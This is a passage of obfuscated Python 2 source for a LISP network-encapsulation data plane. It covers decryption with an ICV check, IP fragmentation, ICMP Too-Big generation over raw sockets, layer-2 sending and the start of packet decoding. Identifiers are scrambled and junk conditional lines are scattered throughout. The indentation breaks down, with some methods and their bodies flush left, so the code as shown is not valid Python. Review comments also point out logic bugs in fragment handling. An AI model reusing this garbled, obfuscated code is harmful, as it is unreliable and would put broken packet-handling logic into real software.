        elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
            iIiiII = 12
            oo0O0OO0Oo = bold ( "aes-gcm" , False )
        else :
            iIiiII = 16
            oo0O0OO0Oo = bold ( "aes-cbc" , False )
        if 13 - 13: II111iiii
        oo0O = packet [ 0 : iIiiII ]
        if 55 - 55: Oo0Ooo % i1IIi * I11i
        if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
        if 63 - 63: iIii1I11I1II1 / ooOoO0o
        if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
        # Recompute the ICV over LISP-header + IV + ciphertext and
        # require an exact match before decrypting.
        iI1ii = key . do_icv ( oOOOoo00oO + packet , oo0O )
        if 61 - 61: Oo0Ooo * i1IIi . OoooooooOO
        iIIiI = "0x{}...{}" . format ( iI [ 0 : O00OOOo0Oo0 ] , iI [ - O00OOOo0Oo0 : : ] )
        O0O0O0OO00oo = "0x{}...{}" . format ( iI1ii [ 0 : O00OOOo0Oo0 ] , iI1ii [ - O00OOOo0Oo0 : : ] )
        if 39 - 39: IiII % OoOoOO00 * I1ii11iIi11i - OoooooooOO - Oo0Ooo
        if ( iI1ii != iI ) :
            # ICV failed: log, let lisp_retry_decap_keys() try other
            # stored keys for this RLOC, and drop the packet.
            self . packet_error = "ICV-error"
            Oo0 = oo0O0OO0Oo + "/" + o00oo
            oOOO = bold ( "ICV failed ({})" . format ( Oo0 ) , False )
            iI11Iii1I = "packet-ICV {} != computed-ICV {}" . format ( iIIiI , O0O0O0OO00oo )
            dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( oOOO , red ( addr_str , False ) ,
                # OOooOOo + iII111i % iIii1I11I1II1 - I1ii11iIi11i
                self . udp_sport , key . key_id , iI11Iii1I ) )
            dprint ( "{}" . format ( key . print_keys ( ) ) )
            if 33 - 33: OoOoOO00 / OoO0O00
            if 47 - 47: iII111i + O0 / II111iiii * I1IiiI - OoooooooOO . Ii1I
            if 28 - 28: oO0o . oO0o . iIii1I11I1II1 . OOooOOo . I1ii11iIi11i * i11iIiiIii
            if 72 - 72: I11i
            if 26 - 26: IiII % Oo0Ooo
            if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
            lisp_retry_decap_keys ( addr_str , oOOOoo00oO + packet , oo0O , iI )
            return ( [ None , False ] )
        if 83 - 83: IiII - I1IiiI . Ii1I
        if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
        if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
        if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
        if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
        # Drop the IV; what remains is pure ciphertext.
        packet = packet [ iIiiII : : ]
        if 25 - 25: Oo0Ooo % OoOoOO00
        if 75 - 75: i1IIi
        if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
        if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
        # Select the decrypt function for the key's cipher suite.
        Oo0OO0000oooo = lisp_get_timestamp ( )
        if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
            O00oooO00oo = chacha . ChaCha ( key . encrypt_key , oo0O ) . decrypt
        elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
            oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
            try :
                O00oooO00oo = AES . new ( oo0O0000O0 , AES . MODE_GCM , oo0O ) . decrypt
            except :
                self . packet_error = "no-decrypt-key"
                lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
                return ( [ None , False ] )
            if 44 - 44: iIii1I11I1II1 * I1Ii111 * Oo0Ooo * I1ii11iIi11i + I11i
        else :
            # AES-CBC requires whole cipher blocks.
            if ( ( len ( packet ) % 16 ) != 0 ) :
                dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
                return ( [ None , False ] )
            if 12 - 12: I1ii11iIi11i * ooOoO0o - I11i . OoO0O00 + OoO0O00 + iII111i
            oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
            O00oooO00oo = AES . new ( oo0O0000O0 , AES . MODE_CBC , oo0O ) . decrypt
        if 29 - 29: OoooooooOO . I1Ii111 % I1Ii111
        if 9 - 9: Oo0Ooo - Oo0Ooo - o0oOOo0O0Ooo + I1Ii111 - II111iiii . I1IiiI
        O0Ooooo0 = O00oooO00oo ( packet )
        # Elapsed decrypt time taken from the fractional seconds (usec).
        Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
        if 74 - 74: o0oOOo0O0Ooo / oO0o - II111iiii . II111iiii . IiII + II111iiii
        if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
        if 80 - 80: iII111i
        if 3 - 3: I1ii11iIi11i * I11i
        IIIiiiI1Ii1 = bold ( "Decrypt" , False )
        addr_str = "RLOC: " + red ( addr_str , False )
        oO00o0oO0O = "poly" if key . do_poly else "sha256"
        oO00o0oO0O = bold ( oO00o0oO0O , False )
        iI11Iii1I = "ICV({}): {}" . format ( oO00o0oO0O , iIIiI )
        dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( IIIiiiI1Ii1 , key . key_id , addr_str , iI11Iii1I , oo0O0OO0Oo , Oo0OO0000oooo ) )
        if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
        if 74 - 74: Oo0Ooo
        if 8 - 8: I1IiiI % II111iiii - o0oOOo0O0Ooo - I11i % I1IiiI
        if 93 - 93: Ii1I * iII111i / OOooOOo
        if 88 - 88: oO0o
        if 1 - 1: Oo0Ooo
        if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
        # Keep only the outer headers in self.packet; the caller splices
        # the returned plaintext back on.
        self . packet = self . packet [ 0 : header_length ]
        return ( [ O0Ooooo0 , True ] )
if 75 - 75: O0
if 56 - 56: OoO0O00 / II111iiii
def fragment_outer ( self , outer_hdr , inner_packet ) :
IIIiiiiI1 = 1000
if 40 - 40: O0 + IiII . Ii1I
if 29 - 29: OOooOOo / OoOoOO00 . iIii1I11I1II1 / I11i % OoOoOO00 % iII111i
if 49 - 49: II111iiii / IiII - Ii1I
if 7 - 7: I1IiiI / OoO0O00 + I1Ii111 + I11i / I1IiiI
if 82 - 82: I1ii11iIi11i + OoooooooOO
IIiIi11i111II = [ ]
i1 = 0
iI1 = len ( inner_packet )
while ( i1 < iI1 ) :
Iii1I = inner_packet [ i1 : : ]
if ( len ( Iii1I ) > IIIiiiiI1 ) : Iii1I = Iii1I [ 0 : IIIiiiiI1 ]
IIiIi11i111II . append ( Iii1I )
i1 += len ( Iii1I )
if 52 - 52: OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
if 31 - 31: i1IIi % II111iiii
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
i1I = [ ]
i1 = 0
for Iii1I in IIiIi11i111II :
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
iIIi1 = i1 if ( Iii1I == IIiIi11i111II [ - 1 ] ) else 0x2000 + i1
iIIi1 = socket . htons ( iIIi1 )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , iIIi1 ) + outer_hdr [ 8 : : ]
if 76 - 76: I1IiiI - I1IiiI - o0oOOo0O0Ooo % ooOoO0o * O0
if 11 - 11: Ii1I + I11i . OoO0O00 . i11iIiiIii * OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
o0000oO = socket . htons ( len ( Iii1I ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
i1I . append ( outer_hdr + Iii1I )
i1 += len ( Iii1I ) / 8
if 83 - 83: OoO0O00
return ( i1I )
if 16 - 16: ooOoO0o
if 32 - 32: o0oOOo0O0Ooo % I1IiiI
    def send_icmp_too_big ( self , inner_packet ) :
        """
        Send an ICMP Destination Unreachable / Fragmentation-Needed
        (type 3, code 4) with next-hop MTU 1400 back to the inner source
        of a too-large packet that has the DF bit set. Rate limited via
        lisp_last_icmp_too_big_sent. Returns True when the ICMP message
        was sent, False when rate-limited or the raw send failed.
        """
        global lisp_last_icmp_too_big_sent
        global lisp_icmp_raw_socket
        if 7 - 7: Oo0Ooo . i1IIi - oO0o
        o0O0oO0 = time . time ( ) - lisp_last_icmp_too_big_sent
        if ( o0O0oO0 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
            lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
            if 93 - 93: IiII % I1ii11iIi11i
            return ( False )
        if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
        if 28 - 28: Ii1I . I1ii11iIi11i
        if 77 - 77: I1ii11iIi11i % II111iiii
        if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
        if 90 - 90: o0oOOo0O0Ooo
        if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
        if 32 - 32: IiII - ooOoO0o * iII111i * I11i
        if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
        if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
        if 94 - 94: I11i / OoO0O00 . o0oOOo0O0Ooo
        if 1 - 1: Oo0Ooo . II111iiii
        if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
        if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
        if 4 - 4: IiII
        if 16 - 16: iIii1I11I1II1 * iII111i + oO0o . O0 . o0oOOo0O0Ooo
        # ICMP body: type 3, code 4, checksum 0 (filled below), unused,
        # next-hop MTU 1400, followed by the offending inner IP header
        # plus the first 8 bytes of its payload, per RFC 792.
        oo00o00O0 = socket . htons ( 1400 )
        O0o0oo0oOO0oO = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , oo00o00O0 )
        O0o0oo0oOO0oO += inner_packet [ 0 : 20 + 8 ]
        O0o0oo0oOO0oO = lisp_icmp_checksum ( O0o0oo0oOO0oO )
        if 52 - 52: iII111i + O0 % o0oOOo0O0Ooo % O0 % II111iiii + OoooooooOO
        if 51 - 51: iII111i % i11iIiiIii
        if 28 - 28: I1ii11iIi11i + I1ii11iIi11i % OoOoOO00
        if 12 - 12: I11i
        if 19 - 19: Ii1I * i1IIi % O0 + I11i
        if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
        if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
        # Destination is the inner source (raw bytes 12:16 of the inner
        # header for the wire destination field; printable form for
        # sendto()); source is our outer RLOC address.
        IIi1I1 = inner_packet [ 12 : 16 ]
        oO00o0oOoo = self . inner_source . print_address_no_iid ( )
        oOO = self . outer_source . pack_address ( )
        if 38 - 38: I11i . IiII - OoO0O00 . I1IiiI
        if 65 - 65: I1Ii111
        if 31 - 31: i11iIiiIii / OoOoOO00 % I1ii11iIi11i
        if 44 - 44: II111iiii * I1IiiI + OOooOOo
        if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
        if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
        if 46 - 46: i11iIiiIii
        if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
        # Outer IPv4 header: total length 20 + 36 (ICMP header + copied
        # data), ttl 32, protocol 1 (ICMP); byte order fixed up for the
        # raw socket by fix_outer_header().
        IIIIIiiI11i1 = socket . htons ( 20 + 36 )
        iIiiIIi = struct . pack ( "BBHHHBBH" , 0x45 , 0 , IIIIIiiI11i1 , 0 , 0 , 32 , 1 , 0 ) + oOO + IIi1I1
        iIiiIIi = lisp_ip_checksum ( iIiiIIi )
        iIiiIIi = self . fix_outer_header ( iIiiIIi )
        iIiiIIi += O0o0oo0oOO0oO
        I11111ii1i = bold ( "Too-Big" , False )
        lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( I11111ii1i , oO00o0oOoo ,
            lisp_format_packet ( iIiiIIi ) ) )
        if 78 - 78: I11i % Oo0Ooo + OoOoOO00 . I1ii11iIi11i % oO0o / Ii1I
        try :
            lisp_icmp_raw_socket . sendto ( iIiiIIi , ( oO00o0oOoo , 0 ) )
        except socket . error , o0OoO00 :
            lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( o0OoO00 ) )
            return ( False )
        if 37 - 37: oO0o % I1Ii111 % oO0o
        if 14 - 14: OoO0O00 / I1IiiI
        if 66 - 66: Oo0Ooo / i11iIiiIii % ooOoO0o
        if 43 - 43: OOooOOo
        if 84 - 84: OOooOOo . IiII . iII111i
        if 2 - 2: Oo0Ooo - OoOoOO00
        # Start a new rate-limit window only after a successful send.
        lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
        return ( True )
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
    def fragment ( self ) :
        """
        Split self.packet into MTU-sized (<= 1500 byte) pieces for
        transmission. Returns a (fragment-list, reason-string) tuple:
        "Fragment-None" (fits as-is), "Fragment-Outer" (non-IPv4 inner,
        outer IPv4 header fragmented), "Fragment-Inner" (inner IPv4
        header fragmented), "Fragment-None-DF-bit" (dropped, DF set), or
        ([], None) when an ICMP Too-Big was sent instead.
        """
        global lisp_icmp_raw_socket
        global lisp_ignore_df_bit
        if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
        ii1i1II = self . fix_outer_header ( self . packet )
        if 16 - 16: I1ii11iIi11i * iII111i / I11i
        if 46 - 46: II111iiii
        if 13 - 13: IiII + II111iiii % I1IiiI
        if 30 - 30: OoooooooOO - i11iIiiIii + oO0o / Oo0Ooo - i11iIiiIii
        if 74 - 74: O0 . I11i
        if 64 - 64: ooOoO0o / i1IIi % iII111i
        # Fast path: no fragmentation needed.
        iI1 = len ( ii1i1II )
        if ( iI1 <= 1500 ) : return ( [ ii1i1II ] , "Fragment-None" )
        if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
        ii1i1II = self . packet
        if 99 - 99: I1Ii111
        if 75 - 75: ooOoO0o . OOooOOo / IiII
        if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
        if 86 - 86: Oo0Ooo % OoOoOO00
        if 77 - 77: Ii1I % OOooOOo / oO0o
        # Non-IPv4 inner packet: fragment on the outer IPv4 header with a
        # random IP ident instead.
        if ( self . inner_version != 4 ) :
            OOoOo = random . randint ( 0 , 0xffff )
            Iiiiiii11IIiI = ii1i1II [ 0 : 4 ] + struct . pack ( "H" , OOoOo ) + ii1i1II [ 6 : 20 ]
            oOOO0o = ii1i1II [ 20 : : ]
            i1I = self . fragment_outer ( Iiiiiii11IIiI , oOOO0o )
            return ( i1I , "Fragment-Outer" )
        if 70 - 70: i11iIiiIii / ooOoO0o * I1ii11iIi11i - i1IIi + ooOoO0o
        if 37 - 37: OOooOOo / i11iIiiIii
        if 63 - 63: OoO0O00 + ooOoO0o
        if 3 - 3: OoOoOO00 - I1Ii111 / oO0o . O0 * ooOoO0o / I1ii11iIi11i
        if 18 - 18: Ii1I
        # Inner IPv4: split the buffer into outer headers (IP + UDP +
        # LISP = 36 bytes for v4 outer, 56 for v6), the 20-byte inner
        # IPv4 header, and the inner payload.
        o0OOoO = 56 if ( self . outer_version == 6 ) else 36
        Iiiiiii11IIiI = ii1i1II [ 0 : o0OOoO ]
        I1iII1II1I1ii = ii1i1II [ o0OOoO : o0OOoO + 20 ]
        oOOO0o = ii1i1II [ o0OOoO + 20 : : ]
        if 54 - 54: OoooooooOO + Oo0Ooo * OOooOOo
        if 98 - 98: oO0o - oO0o . ooOoO0o
        if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
        if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
        if 93 - 93: IiII / i1IIi
        # Honor the inner DF bit (0x4000): try ICMP Too-Big first, then
        # either clear DF (if configured to ignore it) or drop.
        i111IiIi1 = struct . unpack ( "H" , I1iII1II1I1ii [ 6 : 8 ] ) [ 0 ]
        i111IiIi1 = socket . ntohs ( i111IiIi1 )
        if ( i111IiIi1 & 0x4000 ) :
            if ( lisp_icmp_raw_socket != None ) :
                iii1111iIi1i1 = ii1i1II [ o0OOoO : : ]
                if ( self . send_icmp_too_big ( iii1111iIi1i1 ) ) : return ( [ ] , None )
            if 65 - 65: OoOoOO00 . II111iiii % iII111i + Ii1I
            if ( lisp_ignore_df_bit ) :
                i111IiIi1 &= ~ 0x4000
            else :
                IIIiii11 = bold ( "DF-bit set" , False )
                dprint ( "{} in inner header, packet discarded" . format ( IIIiii11 ) )
                return ( [ ] , "Fragment-None-DF-bit" )
        if 12 - 12: I1IiiI + I1Ii111
        if 80 - 80: oO0o . O0
        if 90 - 90: II111iiii / OoO0O00 / Ii1I
        # Carve the inner payload into 1400-byte chunks.
        i1 = 0
        iI1 = len ( oOOO0o )
        i1I = [ ]
        while ( i1 < iI1 ) :
            i1I . append ( oOOO0o [ i1 : i1 + 1400 ] )
            i1 += 1400
        if 70 - 70: Ii1I - II111iiii . Oo0Ooo / Oo0Ooo
        if 30 - 30: oO0o . OoO0O00 + I11i / iIii1I11I1II1 % Oo0Ooo / oO0o
        if 3 - 3: I1ii11iIi11i / II111iiii
        if 73 - 73: OoO0O00 * OoooooooOO - OoooooooOO + I1IiiI * Oo0Ooo
        if 87 - 87: o0oOOo0O0Ooo / IiII / i11iIiiIii
        # Carry over any fragmentation state the inner packet already
        # had: preserve an incoming MF bit and start from its offset.
        IIiIi11i111II = i1I
        i1I = [ ]
        ooo00 = True if i111IiIi1 & 0x2000 else False
        i111IiIi1 = ( i111IiIi1 & 0x1fff ) * 8
        for Iii1I in IIiIi11i111II :
            if 65 - 65: I1Ii111 + iII111i * iII111i
            if 79 - 79: i1IIi / Oo0Ooo - I1IiiI . O0
            if 56 - 56: IiII % O0 * i1IIi - II111iiii
            if 74 - 74: i1IIi - OoOoOO00 % oO0o . O0 - OoooooooOO
            # Build this fragment's offset/MF field (8-byte units).
            # NOTE(review): the last-fragment test compares chunk CONTENT
            # against the final chunk; a repeated payload chunk equal to
            # the last one would lose its MF bit — compare by index.
            oOooOOOO0oOo = i111IiIi1 / 8
            if ( ooo00 ) :
                oOooOOOO0oOo |= 0x2000
            elif ( Iii1I != IIiIi11i111II [ - 1 ] ) :
                oOooOOOO0oOo |= 0x2000
            if 12 - 12: OoooooooOO
            oOooOOOO0oOo = socket . htons ( oOooOOOO0oOo )
            I1iII1II1I1ii = I1iII1II1I1ii [ 0 : 6 ] + struct . pack ( "H" , oOooOOOO0oOo ) + I1iII1II1I1ii [ 8 : : ]
            if 55 - 55: I1ii11iIi11i + I1ii11iIi11i
            if 87 - 87: IiII
            if 78 - 78: oO0o % OoOoOO00
            if 1 - 1: OoOoOO00 - o0oOOo0O0Ooo / ooOoO0o - IiII / i1IIi
            if 28 - 28: OoO0O00 / I1Ii111 * I1IiiI + ooOoO0o
            if 48 - 48: O0
            # Patch inner total-length, zero its checksum field, then
            # recompute the inner header checksum.
            iI1 = len ( Iii1I )
            i111IiIi1 += iI1
            o0000oO = socket . htons ( iI1 + 20 )
            I1iII1II1I1ii = I1iII1II1I1ii [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + I1iII1II1I1ii [ 4 : 10 ] + struct . pack ( "H" , 0 ) + I1iII1II1I1ii [ 12 : : ]
            if 44 - 44: OoO0O00 * oO0o
            I1iII1II1I1ii = lisp_ip_checksum ( I1iII1II1I1ii )
            o0oOoOooOOo = I1iII1II1I1ii + Iii1I
            if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
            if 27 - 27: IiII + iIii1I11I1II1 / Oo0Ooo + OoO0O00 % Oo0Ooo + OoO0O00
            if 77 - 77: Oo0Ooo * ooOoO0o % Ii1I
            if 2 - 2: I11i / Oo0Ooo / Ii1I / I1ii11iIi11i / OoooooooOO
            if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
            # Re-attach and fix up the outer headers for an IPv4 outer.
            # NOTE(review): the v6-outer case never re-prepends the outer
            # header here — presumably handled by another send path;
            # TODO confirm.
            iI1 = len ( o0oOoOooOOo )
            if ( self . outer_version == 4 ) :
                o0000oO = iI1 + o0OOoO
                iI1 += 16
                Iiiiiii11IIiI = Iiiiiii11IIiI [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + Iiiiiii11IIiI [ 4 : : ]
                if 98 - 98: OOooOOo
                Iiiiiii11IIiI = lisp_ip_checksum ( Iiiiiii11IIiI )
                o0oOoOooOOo = Iiiiiii11IIiI + o0oOoOooOOo
                o0oOoOooOOo = self . fix_outer_header ( o0oOoOooOOo )
            if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
            if 75 - 75: OoO0O00 % OoooooooOO
            if 16 - 16: O0 / i1IIi
            if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
            if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
            # Patch the UDP length field (12 bytes before the end of the
            # outer headers) for this fragment.
            iIiI1I = o0OOoO - 12
            o0000oO = socket . htons ( iI1 )
            o0oOoOooOOo = o0oOoOooOOo [ 0 : iIiI1I ] + struct . pack ( "H" , o0000oO ) + o0oOoOooOOo [ iIiI1I + 2 : : ]
            if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
            i1I . append ( o0oOoOooOOo )
        if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
        return ( i1I , "Fragment-Inner" )
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
def fix_outer_header ( self , packet ) :
if 58 - 58: iII111i
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
if 44 - 44: OoO0O00 + I11i % OoO0O00 + i1IIi + iII111i + O0
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
return ( packet )
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
dest = dest . print_address_no_iid ( )
i1I , ooo000 = self . fragment ( )
if 82 - 82: iIii1I11I1II1 * OoooooooOO
for o0oOoOooOOo in i1I :
if ( len ( i1I ) != 1 ) :
self . packet = o0oOoOooOOo
self . print_packet ( ooo000 , True )
if 50 - 50: I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
try : lisp_raw_socket . sendto ( o0oOoOooOOo , ( dest , 0 ) )
except socket . error , o0OoO00 :
lprint ( "socket.sendto() failed: {}" . format ( o0OoO00 ) )
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
if 22 - 22: I1Ii111
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 23 - 23: O0
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
ii1i1II = mac_header + self . packet
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
if 80 - 80: I1IiiI
if 58 - 58: oO0o + I1ii11iIi11i % OoOoOO00
if 22 - 22: iIii1I11I1II1 - Ii1I / I1IiiI * IiII
if 26 - 26: o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
if 23 - 23: I11i
if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
l2_socket . write ( ii1i1II )
return
if 54 - 54: OoooooooOO . oO0o - iII111i
if 76 - 76: I1Ii111
def bridge_l2_packet ( self , eid , db ) :
try : O00o0 = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : I1i = lisp_myinterfaces [ O00o0 . interface ]
except : return
try :
socket = I1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 98 - 98: iIii1I11I1II1 + i11iIiiIii * I1ii11iIi11i / I1Ii111 / ooOoO0o - O0
try : socket . send ( self . packet )
except socket . error , o0OoO00 :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( o0OoO00 ) )
if 42 - 42: iII111i
if 77 - 77: i1IIi * oO0o % OoooooooOO + O0 * ooOoO0o
if 28 - 28: I11i . OoooooooOO * OOooOOo + i11iIiiIii % I1IiiI . iIii1I11I1II1
def is_lisp_packet ( self , packet ) :
O0OO0ooO00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( O0OO0ooO00 == False ) : return ( False )
if 63 - 63: II111iiii - I11i . OoOoOO00
IIi1I1iII111 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( IIi1I1iII111 ) == LISP_DATA_PORT ) : return ( True )
IIi1I1iII111 = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( IIi1I1iII111 ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 76 - 76: ooOoO0o . oO0o
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
 def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :

  #
  # Parse the outer IPv4/IPv6, UDP and LISP headers (only when
  # is_lisp_packet is True), decrypt the payload when the LISP header
  # key-bits are set, then parse the inner IPv4/IPv6/MAC header into
  # the self.inner_* fields.  Returns self on success and None on any
  # error; the failure reason is left in self.packet_error and, when a
  # stats dictionary is supplied, counted against the packet length.
  #
  self . packet_error = ""
  ii1i1II = self . packet
  O0ooO = len ( ii1i1II )
  Iii1iIIIi11I1 = IIII11Ii1I11I = True
  if 40 - 40: Ii1I + I1ii11iIi11i * I1Ii111 - oO0o % Ii1I
  if 67 - 67: I1ii11iIi11i
  if 3 - 3: I1Ii111 . I11i % II111iiii * I1IiiI % i1IIi * OoO0O00
  if 5 - 5: II111iiii * i1IIi % Ii1I
  oO000O = 0
  oOo00Ooo0o0 = 0
  if ( is_lisp_packet ) :
   oOo00Ooo0o0 = self . lisp_header . get_instance_id ( )
   Oo0o0OoOoOo0 = struct . unpack ( "B" , ii1i1II [ 0 : 1 ] ) [ 0 ]
   self . outer_version = Oo0o0OoOoOo0 >> 4
   if ( self . outer_version == 4 ) :
    if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
    if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
    if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
    if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
    if 22 - 22: i1IIi

    #
    # Recompute the IPv4 header checksum: a nonzero result means the
    # header is corrupt.  A received checksum of zero is tolerated on
    # macOS, whose raw sockets can deliver it zeroed.
    #
    IIIII1II1111 = struct . unpack ( "H" , ii1i1II [ 10 : 12 ] ) [ 0 ]
    ii1i1II = lisp_ip_checksum ( ii1i1II )
    i1I1iI = struct . unpack ( "H" , ii1i1II [ 10 : 12 ] ) [ 0 ]
    if ( i1I1iI != 0 ) :
